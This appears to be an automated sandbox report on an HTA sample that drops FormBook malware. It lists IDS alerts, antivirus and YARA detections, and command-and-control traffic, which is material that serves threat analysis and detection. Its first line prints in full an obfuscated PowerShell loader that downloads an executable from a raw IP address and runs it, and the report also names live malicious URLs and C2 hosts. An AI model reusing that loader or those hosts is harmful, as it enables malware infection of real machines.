iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8812, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline", ProcessId: 8932, ProcessName: csc.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-17T01:18:58.608193+010020220501A Network Trojan was detected172.245.123.2480192.168.2.549717TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-17T01:18:58.699080+010020220511A Network Trojan was detected172.245.123.2480192.168.2.549717TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-17T01:19:39.176299+010028554651A Network Trojan was detected192.168.2.5497253.33.130.19080TCP
                  2025-03-17T01:20:02.384367+010028554651A Network Trojan was detected192.168.2.54973313.248.169.4880TCP
                  2025-03-17T01:20:16.862307+010028554651A Network Trojan was detected192.168.2.549737208.91.197.2780TCP
                  2025-03-17T01:20:30.404146+010028554651A Network Trojan was detected192.168.2.549741209.74.77.23080TCP
                  2025-03-17T01:20:43.712985+010028554651A Network Trojan was detected192.168.2.54974513.248.169.4880TCP
                  2025-03-17T01:20:56.890380+010028554651A Network Trojan was detected192.168.2.5497493.33.130.19080TCP
                  2025-03-17T01:21:10.041040+010028554651A Network Trojan was detected192.168.2.54975313.248.169.4880TCP
                  2025-03-17T01:21:23.366793+010028554651A Network Trojan was detected192.168.2.54975792.204.40.9880TCP
                  2025-03-17T01:21:37.871543+010028554651A Network Trojan was detected192.168.2.54976147.83.1.9080TCP
                  2025-03-17T01:21:51.064071+010028554651A Network Trojan was detected192.168.2.54976513.248.243.580TCP
                  2025-03-17T01:22:04.483557+010028554651A Network Trojan was detected192.168.2.54976913.248.169.4880TCP
                  2025-03-17T01:22:17.745205+010028554651A Network Trojan was detected192.168.2.549773162.255.118.6880TCP
                  2025-03-17T01:22:31.289518+010028554651A Network Trojan was detected192.168.2.54977713.248.169.4880TCP
                  2025-03-17T01:22:45.315215+010028554651A Network Trojan was detected192.168.2.54978137.27.60.10980TCP
                  2025-03-17T01:22:58.499162+010028554651A Network Trojan was detected192.168.2.54978513.248.169.4880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-17T01:19:55.780889+010028554641A Network Trojan was detected192.168.2.54973013.248.169.4880TCP
                  2025-03-17T01:19:57.293046+010028554641A Network Trojan was detected192.168.2.54973113.248.169.4880TCP
                  2025-03-17T01:19:59.817895+010028554641A Network Trojan was detected192.168.2.54973213.248.169.4880TCP
                  2025-03-17T01:20:08.174110+010028554641A Network Trojan was detected192.168.2.549734208.91.197.2780TCP
                  2025-03-17T01:20:10.717629+010028554641A Network Trojan was detected192.168.2.549735208.91.197.2780TCP
                  2025-03-17T01:20:13.267479+010028554641A Network Trojan was detected192.168.2.549736208.91.197.2780TCP
                  2025-03-17T01:20:22.737861+010028554641A Network Trojan was detected192.168.2.549738209.74.77.23080TCP
                  2025-03-17T01:20:25.308369+010028554641A Network Trojan was detected192.168.2.549739209.74.77.23080TCP
                  2025-03-17T01:20:27.825947+010028554641A Network Trojan was detected192.168.2.549740209.74.77.23080TCP
                  2025-03-17T01:20:35.935996+010028554641A Network Trojan was detected192.168.2.54974213.248.169.4880TCP
                  2025-03-17T01:20:38.513525+010028554641A Network Trojan was detected192.168.2.54974313.248.169.4880TCP
                  2025-03-17T01:20:41.160653+010028554641A Network Trojan was detected192.168.2.54974413.248.169.4880TCP
                  2025-03-17T01:20:49.241256+010028554641A Network Trojan was detected192.168.2.5497463.33.130.19080TCP
                  2025-03-17T01:20:51.765087+010028554641A Network Trojan was detected192.168.2.5497473.33.130.19080TCP
                  2025-03-17T01:20:54.361436+010028554641A Network Trojan was detected192.168.2.5497483.33.130.19080TCP
                  2025-03-17T01:21:03.452774+010028554641A Network Trojan was detected192.168.2.54975013.248.169.4880TCP
                  2025-03-17T01:21:05.999709+010028554641A Network Trojan was detected192.168.2.54975113.248.169.4880TCP
                  2025-03-17T01:21:07.492535+010028554641A Network Trojan was detected192.168.2.54975213.248.169.4880TCP
                  2025-03-17T01:21:15.740835+010028554641A Network Trojan was detected192.168.2.54975492.204.40.9880TCP
                  2025-03-17T01:21:18.267561+010028554641A Network Trojan was detected192.168.2.54975592.204.40.9880TCP
                  2025-03-17T01:21:20.828379+010028554641A Network Trojan was detected192.168.2.54975692.204.40.9880TCP
                  2025-03-17T01:21:29.952780+010028554641A Network Trojan was detected192.168.2.54975847.83.1.9080TCP
                  2025-03-17T01:21:32.671635+010028554641A Network Trojan was detected192.168.2.54975947.83.1.9080TCP
                  2025-03-17T01:21:35.265365+010028554641A Network Trojan was detected192.168.2.54976047.83.1.9080TCP
                  2025-03-17T01:21:43.419139+010028554641A Network Trojan was detected192.168.2.54976213.248.243.580TCP
                  2025-03-17T01:21:45.983213+010028554641A Network Trojan was detected192.168.2.54976313.248.243.580TCP
                  2025-03-17T01:21:48.522856+010028554641A Network Trojan was detected192.168.2.54976413.248.243.580TCP
                  2025-03-17T01:21:56.844863+010028554641A Network Trojan was detected192.168.2.54976613.248.169.4880TCP
                  2025-03-17T01:21:59.381251+010028554641A Network Trojan was detected192.168.2.54976713.248.169.4880TCP
                  2025-03-17T01:22:01.924930+010028554641A Network Trojan was detected192.168.2.54976813.248.169.4880TCP
                  2025-03-17T01:22:10.102153+010028554641A Network Trojan was detected192.168.2.549770162.255.118.6880TCP
                  2025-03-17T01:22:12.664179+010028554641A Network Trojan was detected192.168.2.549771162.255.118.6880TCP
                  2025-03-17T01:22:15.197186+010028554641A Network Trojan was detected192.168.2.549772162.255.118.6880TCP
                  2025-03-17T01:22:23.642937+010028554641A Network Trojan was detected192.168.2.54977413.248.169.4880TCP
                  2025-03-17T01:22:27.234100+010028554641A Network Trojan was detected192.168.2.54977513.248.169.4880TCP
                  2025-03-17T01:22:28.743778+010028554641A Network Trojan was detected192.168.2.54977613.248.169.4880TCP
                  2025-03-17T01:22:37.669328+010028554641A Network Trojan was detected192.168.2.54977837.27.60.10980TCP
                  2025-03-17T01:22:40.206021+010028554641A Network Trojan was detected192.168.2.54977937.27.60.10980TCP
                  2025-03-17T01:22:42.761578+010028554641A Network Trojan was detected192.168.2.54978037.27.60.10980TCP
                  2025-03-17T01:22:50.824342+010028554641A Network Trojan was detected192.168.2.54978213.248.169.4880TCP
                  2025-03-17T01:22:53.370592+010028554641A Network Trojan was detected192.168.2.54978313.248.169.4880TCP
                  2025-03-17T01:22:55.925209+010028554641A Network Trojan was detected192.168.2.54978413.248.169.4880TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://www.anartisthuman.info/q5nb/Avira URL Cloud: Label: malware
                  Source: http://www.anartisthuman.info/__media__/js/trademark.php?d=anartisthuman.info&type=nsAvira URL Cloud: Label: malware
                  Source: http://www.Anartisthuman.infoAvira URL Cloud: Label: malware
                  Source: http://www.anartisthuman.info/__media__/design/underconstructionnotice.php?d=anartisthuman.infoAvira URL Cloud: Label: malware
                  Source: http://www.agistaking.xyz/c8u0/Avira URL Cloud: Label: malware
                  Source: http://www.agistaking.xyz/c8u0/?TXWhc2=FMJVgFO6r2fqsFEm0j1rtldefhT15/tuwnCszuFGPNY4Pf96ze7C0LpVaGXgsqc5GUWtyfXO8eoeNGfDqQZm9XVSjZoRocim5+cyYEf232QE43y67WXakMxM+EQzn5ZSpw==&p29L=vHcD5B0pXdrXiAvira URL Cloud: Label: malware
                  Source: http://www.anartisthuman.info/q5nb/?TXWhc2=cbGNT1GwMlz4ZJSwsqDu/1ORw1S0MlT/otaQaC2lDUNXgkD5XcZBKJp94L4r/sunAAfx3aeZsm6/D88jzdrZZsCslV3Pj3aMzOE39ueOny0JikO66JbRLIFRZwNKddc1Fg==&p29L=vHcD5B0pXdrXiAvira URL Cloud: Label: malware
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exeReversingLabs: Detection: 70%
                  Source: C:\Users\user\AppData\Roaming\cosses.exeReversingLabs: Detection: 70%
                  Multi AV Scanner detection for submitted file
                  Source: clearpicturewithmebestthingsforgivenmebest.htaVirustotal: Detection: 40%Perma Link
                  Source: clearpicturewithmebestthingsforgivenmebest.htaReversingLabs: Detection: 27%
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Binary string: calc.pdbGCTL source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q8C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.pdb source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: calc.pdb source: svchost.exe, 00000007.00000003.1651170470.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1651036619.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000003.1620980752.00000000006C9000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1602639905.000000000052F000.00000002.00000001.01000000.0000000A.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000000.1753260388.000000000052F000.00000002.00000001.01000000.0000000A.sdmp
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0017445A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017C6D1 FindFirstFileW,FindClose,6_2_0017C6D1
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0017C75C
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0017EF95
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0017F0F2
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0017F3F3
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001737EF
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00173B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00173B12
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0017BCBC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0324C760 FindFirstFileW,FindNextFileW,FindClose,12_2_0324C760
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then xor eax, eax12_2_03239E30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop edi12_2_0323E46D
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then mov ebx, 00000004h12_2_050004D8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 172.245.123.24:80 -> 192.168.2.5:49717
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49725 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49733 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49737 -> 208.91.197.27:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 208.91.197.27:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 208.91.197.27:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 209.74.77.230:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49741 -> 209.74.77.230:80
                  Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 172.245.123.24:80 -> 192.168.2.5:49717
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 209.74.77.230:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49750 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 208.91.197.27:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49754 -> 92.204.40.98:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49756 -> 92.204.40.98:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 92.204.40.98:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49760 -> 47.83.1.90:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49762 -> 13.248.243.5:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49758 -> 47.83.1.90:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49761 -> 47.83.1.90:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49763 -> 13.248.243.5:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49759 -> 47.83.1.90:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 209.74.77.230:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49748 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49768 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49769 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49766 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49770 -> 162.255.118.68:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49764 -> 13.248.243.5:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49765 -> 13.248.243.5:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49753 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49752 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49767 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49772 -> 162.255.118.68:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49757 -> 92.204.40.98:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49771 -> 162.255.118.68:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49773 -> 162.255.118.68:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49775 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49774 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49776 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49779 -> 37.27.60.109:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49782 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49780 -> 37.27.60.109:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49778 -> 37.27.60.109:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49777 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49785 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49783 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49781 -> 37.27.60.109:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49749 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49745 -> 13.248.169.48:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49784 -> 13.248.169.48:80
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: www.agistaking.xyz
                  Source: DNS query: www.zeniow.xyz
                  Source: DNS query: www.multo.xyz
                  Source: DNS query: www.needethereum.xyz
                  Source: DNS query: www.vaishnavi.xyz
                  Source: DNS query: www.minimalbtc.xyz
                  Source: DNS query: www.hypereth.xyz
                  Source: DNS query: www.teschi.xyz
